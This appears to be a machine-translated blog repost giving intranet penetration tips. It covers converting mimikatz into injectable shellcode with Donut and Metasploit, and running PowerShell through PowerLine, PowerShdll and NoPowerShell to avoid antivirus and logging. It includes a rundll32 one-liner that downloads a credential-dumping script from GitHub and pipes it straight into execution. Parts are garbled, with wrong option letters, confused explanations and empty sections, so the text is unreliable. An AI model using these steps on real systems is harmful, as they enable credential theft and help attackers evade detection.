Intranet penetration skills

Enterprise 2023-04-09 17:19:29 views: null

Penetration techniques

msf+Donut interactive execution program

Introduction

ToolDunt

Donut generates x86 or x64 Shellcode from VBScript, JScript, EXE, DLL (including .NET assembly) files. This shellcode can be injected into arbitrary Windows processes for in-memory execution.

Instructions

  1. First msf generates a backdoor program, execute

  2. then execute

    /donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin

    -a: specifies the number of digits, 2 bits and 64 bits
    -o: specifies the output

    get one

    2.png

  3. Executing the module with msf

get an interactive mimikatz

5.png

run powershell method without powershell

PowerLine
Introduction

It is a tool written in c#, which supports local command line calls and remote calls. It can call PowerShell scripts without directly calling PowerShell. The advantages are as follows:

  • Automatically identify win7 and win10 systems
  • Easy to use, no complicated ide required
  • Automatic xor encoding

download link

use

  • First pull the project to the local, then run the build.bat file

    insert image description here

  • Then fill in the address of the powershell script you need to call in the UserConf.xml file. By default, it comes with powerup, powerview, Mimikatz, etc., just add your ps script address according to the format given by him.

  • After the addition is complete, run PLBuilder.exe to build

PowerShdll
Introduction

It mainly uses dll to run powershell without connecting to powershell.exe, so it has a certain bypassAV capability. Of course, it can also run rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32 under these programs .exe or use the separate exe given by the author to execute

use
  • Use PowerShdll -i to enter the interactive mode, then you get an interactive PS environment, you can execute any powershell command

insert image description here

  • dll version usage

    rundll32 PowerShdll.dll,main . { iwr -useb https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1 } ^| iex;

Nopowershell
Introduction

is a tool implemented in C# that supports the execution of PowerShell-like commands while being invisible to any PowerShell logging mechanisms. At the same time, the cna script under CS is also provided.

use

.\NoPowerShell.exe

Run the available version and help command directly

SyncAppvPublishingServer
Introduction
use

msbuild

microsoft.com

Guess you like

Origin blog.csdn.net/qq_43271194/article/details/110393788
Recommended
Ranking
APPIUM operation package, based on java-client-7.0.0
Find the answer
A Case Study of Internal Network Security Analysis of a Hospital
java-springboot简单易学的员工管理系统
php20 invoicing
hyperledger fabric information
Fourth day of June 2019 No. 20 (do do things according to plan)
Linux desktop share breaks through 3%
Pinpointing the nuances JSON format beautify
System modeling software SpecialModeler
Daily
More
2024-07-05(0)
2024-07-04(0)
2024-07-03(0)
2024-07-02(0)
2024-07-01(0)
2024-06-30(0)
2024-06-29(0)
2024-06-28(0)
2024-06-27(0)
2024-06-26(0)

Code World

© 2018 codetd.com